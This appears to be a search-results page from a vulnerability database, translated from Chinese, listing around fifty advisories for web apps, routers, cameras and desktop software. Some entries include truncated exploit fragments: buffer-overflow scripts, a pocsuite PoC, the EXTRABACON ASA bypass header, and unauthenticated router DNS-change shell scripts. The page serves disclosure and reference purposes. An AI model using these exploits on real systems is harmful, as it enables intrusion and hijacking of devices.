56796 matches found
Mastery OA /pda/apps/report/getdata.php arbitrary file upload
No description provided by source...
Google Chrome MailboxManagerImpl repeated read vulnerability
No description provided by source...
Apple OS X < 10.11.5 iMessage denial of service vulnerability
Apple OS X before version 10.11.5 mishandles file name encoding, causing a denial of service vulnerability. The approach used to find the vulnerability is described in the Paper: http://paper.seebug.org/65/ Sending an attachment with the following file name triggers this vulnerability: zzzzzz.htm 1x;color/red;aaa/...
Joomla Huge-IT Video Gallery 1.0.9 ajax_url.php parameter galleryid SQL injection vulnerability
No description provided by source...
Chrome Address Bar URL Spoofing on IOS
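Source link: http://xlab.tencent.com/cn/2016/10/11/CVE-2016-1707-Chrome-Address-Bar-URL-Spoofing-on-IOS/ (English version) http://xisigr.com/x/cve-2016-1707/ 0x00 Vulnerability Overview Chrome browser address bar spoofing vulnerability CVE-2016-1707: I reported this vulnerability to Google in June 2016 and am now sharing the details. A URL spoofing vulnerability can forge a legitimate website address. An attacker can use this vulnerability to launch phishing attacks against users. Affected versions: Chrome...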
Joomla Event Booking Component parameter date SQL injection vulnerability
No description provided by source...
OpenJPEG JPEG2000 mcc record remote code execution vulnerability
No description provided by source...
WDK 8.1 kill.exe memory corruption vulnerability
No description provided by source. import subprocess junk="A"508+"RRRR" pgm='c:\Program Files x86\Windows Kits\8.1\Debuggers\x86\kill.exe ' subprocess.Popenpgm, junk, shell=False...
Disk Pulse Enterprise remote code execution vulnerability
Vulnerability reproduction: Disk Pulse Enterprise is software that monitors disk changes. It can be managed by connecting to the software through management port 9120 or the web management interface on port 80. Disk Pulse Enterprise contains a dynamic link library, libspp.dll, some of which...
Three Yuan up to the wireless AP WPB-5000 arbitrary file read vulnerability
No description provided by source...
FineCMS AttachmentController arbitrary file upload vulnerability
Source link: http://www.hackersb.cn/shenji/170.html This is still AttachmentController, but this time it is not as simple as uploading a file through kindeditorupload and then including it; instead, a script is uploaded and executed directly. This time the problem is in the ajaxswfuploadAction method, whose code is...
WordPress <= 4.6.1 arbitrary code execution vulnerability via language file
Author: p0wd3r, Knownsec 404 Security Lab 0x00 Vulnerability overview 1. Vulnerability description WordPress is a free and open source blogging software and content management system built on PHP and MySQL; recently on GitHub...
Joomla com_remository Component path disclosure vulnerability
No description provided by source...
D-Link DCS IP camera 7411 command execution vulnerability
No description provided by source...
phpok framework/model/wealth.php injection
No description provided by source...
Mastery OA /general/mytable/intel_view/video_file.php arbitrary File Download vulnerability
No description provided by source...
Wordpress <= 4.6.1 Stored XSS Via Theme File
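Author: p0wd3r, Knownsec 404 Security Lab 0x00 Vulnerability overview 1. Vulnerability description WordPress is a free and open source blogging software and content management system built on PHP and MySQL. Researchers recently found in its ... DO NOT CHANGES HERE ... / Next, rename the folder and repackage it: bash mv illdy "" zip -r theme.zip "" Once it is built, we log in to the admin backend and upload the theme file, and start dynamic debugging at the same time. First, go to lines 55-82 of wp-admin/includes/class-theme-installer-skin.php: php $name =...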
Apache Tomcat packaging on Debian-based distros - Local Root Privilege Escalation
I. VULNERABILITY ------------------------- Apache Tomcat® packaging on Debian-based distros - Local Root Privilege Escalation Affected debian packages: Tomcat 8 = 8.0.36-2 Tomcat 7 = 7.0.70-2 Tomcat 6 = 6.0.45+dfsg-1deb8u1 Ubuntu systems are also affected. See section VII. for details. Other...
Cisco WVC80N camera information disclosure vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.api.poc import register from pocsuite.api.poc import Output, POCBase import re import socket import string import base64 import urlparse def b64wvc80nb64content: stdb64 =...
3S Network Camera weak password vulnerability
No description provided by source...
YMail anti-spam system /ymail/cgi/index.cgi HTTP header injection vulnerability
No description provided by source...
Cisco PVC-2300 camera configuration information disclosure vulnerability
No description provided by source...
ECShop v2.7.2 affiche.php parameter uri URL redirection vulnerability
No description provided by source...
Django CSRF Bypass (CVE-2016-7401)
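Author: p0wd3r, Knownsec 404 Security Lab Date: 2016-09-28 0x00 Vulnerability overview 1. Vulnerability description Django is an open source web application framework written in Python. Two years ago a researcher submitted on hackerone a vulnerability that uses Google Analytics to bypass Django's CSRF protection, "CSRF protection bypass on any Django powered site via Google Analytics". With this vulnerability, when a site uses Django as its web framework and has Django's CSRF protection enabled, and at the same time uses Google...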
Three Yuan up to the wireless AP WPB-5000 permission bypass vulnerability
No description provided by source...
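BeesCMS _V4.0_R_20160525 SQL injection (bypassing the global protection)
CAPTCHA design flaw at the admin login. First, the CAPTCHA on the admin login page /admin/login.php is useless: after one verification, requests can be submitted multiple times without refreshing. This provides the precondition for the injection here. SQL Injection In admin/login.php, the core login code is: php // check login elseif$action=='cklogin' global $submit,$user,$password,$sys,$code; $submit=$POST'submit'; $user=flhtmlflvalue$POST'user';...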
Khayelihle Tshuma Design gallery.php parameter id SQL injection vulnerability
No description provided by source...
php 5.0 tidy_parse_file buffer overflow vulnerability
No description provided by source...
WordPress Plugin Image Export local file inclusion vulnerability
No description provided by source...
EKG Gadu local code execution vulnerability
No description provided by source. import os, subprocess def run: try: print " EKG Gadu - Local Buffer Overflow by Juan Sacco" print " This Exploit has been developed using Exploit Pack -http://exploitpack.com" NOPSLED + SHELLCODE + EIP buffersize = 240 nopsled = "\x90"30 shellcode =...
Trendnet TV-IP 410WN camera command execution vulnerability
No description provided by source...
QQ browser Wormable Browser vulnerability
Source link: http://blog.pangu.io/wormable-browser/ Vulnerability description: When local Wi-Fi is on, the Android QQ browser, QQ hot spots and other applications listen on local port 8786 on all local IP addresses. When the attacker and the victim are on the same L...
phpok Host header SQL injection vulnerability
No description provided by source...
Safari showModalDialog method UXSS vulnerability
This article is translated from: http://mksben.l0.cm/2016/09/safari-uxss-showModalDialog.html (English version) http://masatokinugawa.l0.cm/2016/09/safari-uxss-showModalDialog.html (Japanese version) Author: Masato Kinugawa Translator: Holic, Knownsec 404 Security Lab Translator's note: as the...
Safari < 9.1.2 URL redirection vulnerability
This article is translated from: http://www.mbsd.jp/blog/20160921.html, with changes. The original author: a PU ro Fu epolight ッ silicone ョ na Hikaru Cytec ー bldg su division Temple Tian Jian Translator: Holic, Knownsec 404 Security Lab Part of the contents of the translation from MBSD, there...
Drupal Core Full config export configuration file unauthorized download vulnerability
Author: p0wd3r, Knownsec 404 Security Lab 0x00 Vulnerability overview 1. Vulnerability description Drupal (https://www.drupal.org) is a free, open source content management system. Researchers recently found three security vulnerabilities in its 8.x 8.1.10 version, one vulnerability...
Drupal Core 8.x cross-site scripting vulnerability
No description provided by source...
Metasploit Web UI deserialization leading to arbitrary code execution vulnerability
No description provided by source...
Metasploit Weekly Release Static secret_key_base pre-auth remote code execution vulnerability
Author: Justin Steven OVE ID: OVE-20160904-0002 Private disclosure date: 2016-09-04 Public disclosure date: 2016-09-19 Vendor advisory: https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401 Affected versions: Metasploit...
Mastery OA /inc/finger/use_finger.php file SQL injection vulnerabilities
No description provided by source...
Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass
No description provided by source. Cisco ASA 9.23 Authentication Bypass EXTRABACON Module Copyright: c 2016 RiskSense, Inc. https://risksense.com License: http://opensource.org/licenses/MIT Release Date: September 15, 2016 Authors: Sean Dillon 2E3C8D72353C9B8C9FF797E753EC4C9876D5727B Zachary...
Arabseed XCMS m1.php parameter id SQL injection vulnerability
No description provided by source...
Ruvar OA system wf_get_fields_approve.aspx parameter template_id SQL injection vulnerability
No description provided by source...
Mastery OA /general/ems/manage/search_excel.php file SQL injection vulnerabilities
Wide-byte injection occurs where PHP sends a request to MySQL with character_set_client set to a particular encoding. If a GET parameter contains "%df%27", addslashes escapes the quote with '\', turning it into "%df%5c%27"; when MySQL processes it using the gbk characte...
Joomla jVoteSystem 2.56 Component parameter keyword XSS vulnerability
0x01 Vulnerability overview: The keyword parameter of the Joomla jVoteSystem 2.56 Component has a reflected XSS vulnerability. 0x02 Vulnerability analysis http://www.9u4u.be/index.php?option=comjvotesystem&view=polls&cat=cw&keyword=1&Itemid=12jvotesystem Construct the following payload: 1"...
NUUO v3.0.8 multiple video product models css_parser.php parameter css local file disclosure vulnerability
No description provided by source...
Inteno EG101R1 VoIP Router - unauthorized modifications to DNS
No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " Inteno EG101R1 VoIP Router " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
Joomla jVoteSystem 2.56 Component parameter keyword time delay injection vulnerability
No description provided by source...
PLANET VDR-300NU ADSL Router - unauthorized DNS modification
No description provided by source. if $ -gt 3 || $ -lt 2 ; then echo " PLANET VDR-300NU ADSL ROUTER " echo " Unauthenticated Remote DNS Change Exploit" echo " ===================================================================" echo " Usage: $0 " echo " Example: $0 133.7.133.7 8.8.8.8" echo "...
PHPCMS V9 admin backend design flaw leading to arbitrary code execution vulnerability
Source link: http://www.cnbraid.com/ 0x01 Background: Since super administrator privileges are required by default after installation, the vulnerability is of little practical use, but similar issues probably exist in other CMSs as well, so this mainly shares the approach used to find it. PS: using the test environment...